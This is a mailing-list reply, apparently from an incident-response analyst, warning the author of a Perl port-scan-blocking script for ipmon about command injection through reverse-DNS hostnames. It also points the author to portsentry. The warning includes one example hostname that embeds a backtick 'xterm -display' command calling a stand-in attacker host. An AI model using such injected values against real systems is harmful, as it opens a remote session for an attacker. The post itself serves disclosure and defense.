Dan S wrote:
> Hi. I'm not sure if my last email went through
> correctly, so please excuse this if it's a repost. I
> uploaded a Perl script that works with ipmon and log
> rules. It detects port scans, and enters the IP
> address into the rules file, and dynamically blocks
> the host. If you are interested, the script is on
> sourceforge at:
You might want to consider what happens if someone has hostname
resolution enabled in ipmon, starts running this script (admittedly it
won't work well if ipmon is logging hostnames, but someone might not
realize that), and an attacker performs a portscan from an IP that
resolves to, say, 123."`xterm -display
attacker.example.com:0.0`".example.com...
You also might want to have a look at portsentry if you're not familiar
with it.
http://sourceforge.net/projects/sentrytools/
--
Jefferson Ogata <[EMAIL PROTECTED]>
NOAA Computer Incident Response Team (N-CIRT) <[EMAIL PROTECTED]>
